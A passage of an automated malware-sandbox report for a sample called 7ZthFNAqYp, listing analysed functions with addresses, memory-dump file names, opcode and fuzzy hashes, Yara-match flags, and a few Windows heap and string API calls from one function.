                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAC19F77D0F9B2098B364A2D4458A3FFEA66ED2B4531FC395DCD03F189C22AAD0596D0
                                                                                                                                                                                                              Function 6CB21DC0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                              • Instruction ID: 693656ca8142a438b02db072a615d211d43689dc8d5376d12e265abfb701df79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3D13532A146968BDB118E18C8843FA7763AB85338F5D4728C8685B7C6C37FDD0587D2
                                                                                                                                                                                                              Function 0094D6F1 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                              • Instruction ID: 4e0332c5aaa8162b1dc6b0953202ea51c0e9b5247c464dff352c341e0da40d67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FC18F77D1F5B2498B364A2D0418A3FFEA66ED2B4531FC3A5DCD03F289C226AD0596D0
                                                                                                                                                                                                              Function 0094D353 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                              • Instruction ID: b6670e9a80155fd9680b1af9f7c5facb7937bea83680c9ab9f97591c15a6ed5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DB19F77D1F5B20A8B368A2D0418A3FFEA66ED1B4531FC3A5DCD03F189C626AD0596D0
                                                                                                                                                                                                              Function 00939698 Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a968d21191cb63698916886c79358013f4d5741620fbd4374891354843b0d45d
                                                                                                                                                                                                              • Instruction ID: d3cfd6876460ef843d6fb011efb813c8879526c52c0ec6b527c8d08f880a64fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a968d21191cb63698916886c79358013f4d5741620fbd4374891354843b0d45d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B151D1739142159BEB18CF69C4817E9B3B5EFC4308F2544BDCC4AEF286EA706945CB50
                                                                                                                                                                                                              Function 0093B8A3 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f07bdc3382fd0279d40e9b1c6e8f033757f8a34f0bc61fb9ff9b218ea82275d9
                                                                                                                                                                                                              • Instruction ID: 23214e939a419036a9eaeb9c52f81eaf4e1e4d51de359b076d64c94b882d1a79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f07bdc3382fd0279d40e9b1c6e8f033757f8a34f0bc61fb9ff9b218ea82275d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D221EE21578FE205C7844BF9FCC022267D1CBCF21BB9D8269DF90CA172C16DE6229650
                                                                                                                                                                                                              Function 0092119E Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ea87c73c5773f72137c6f03310358a8212b73388e68c81cb6b74eabc986878f5
                                                                                                                                                                                                              • Instruction ID: 9b0549ba9674e2e14b7e560e634be8919d1a531f561495d0b2d389e67708a367
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea87c73c5773f72137c6f03310358a8212b73388e68c81cb6b74eabc986878f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93218EB5D0020A8FCB54CFA9D4816EEFBF4BB48320F50846ECA56F3350E634AA458F94
                                                                                                                                                                                                              Function 6CAB8EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: de2d6bd9db4af2e5e06bd64b293302a958f6bca6cb73e39252b4056ee4eb4ef4
                                                                                                                                                                                                              • Instruction ID: 9cbdd396941f3d90ed7396a4c9f2317f62dea394e91725f50f6df6655a1445eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: de2d6bd9db4af2e5e06bd64b293302a958f6bca6cb73e39252b4056ee4eb4ef4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE119132A012169FD704DF29D884B5AB7B9FF4231CF08426AE8059FA41C775E8C6C7D1
                                                                                                                                                                                                              Function 6CB90C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3b4ec5b75263d7c1d41ce4d16aca12e521e00b2307261b195d0859d015bba3aa
                                                                                                                                                                                                              • Instruction ID: f25226c78a56607fa7541831fee0f029961824bb23eccf727036bf7f9268d34a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b4ec5b75263d7c1d41ce4d16aca12e521e00b2307261b195d0859d015bba3aa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11E3747043459FCB00DF19D88066A7BB2FF8A368F14807DD8198B701DB31E846CBA1
                                                                                                                                                                                                              Function 6CB90D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                              • Instruction ID: 4b8e3e1a866ac8be8d2abadf4782c5161e07e8129ecdc159ff052f77b580bcbd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E0653A2020A467DB148E09D4506A97359DF8B615FA48079CC699BA02D633F9038781
                                                                                                                                                                                                              Function 00938726 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                              • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                              Function 00938725 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                                              • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                                                              Function 0092148A Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                              • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                              Function 009214A2 Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                              • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                                              Function 0092DC75 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0092DB54: lstrlenA.KERNEL32(?,75B65460,?,00000000), ref: 0092DB90
                                                                                                                                                                                                                • Part of subcall function 0092DB54: strchr.MSVCRT ref: 0092DBA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,75B65460,?,00000000), ref: 0092DCD9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DCE0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DCF5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DCFC
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DD18
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DD2A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DD37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0092DD68
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DD6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092DD76
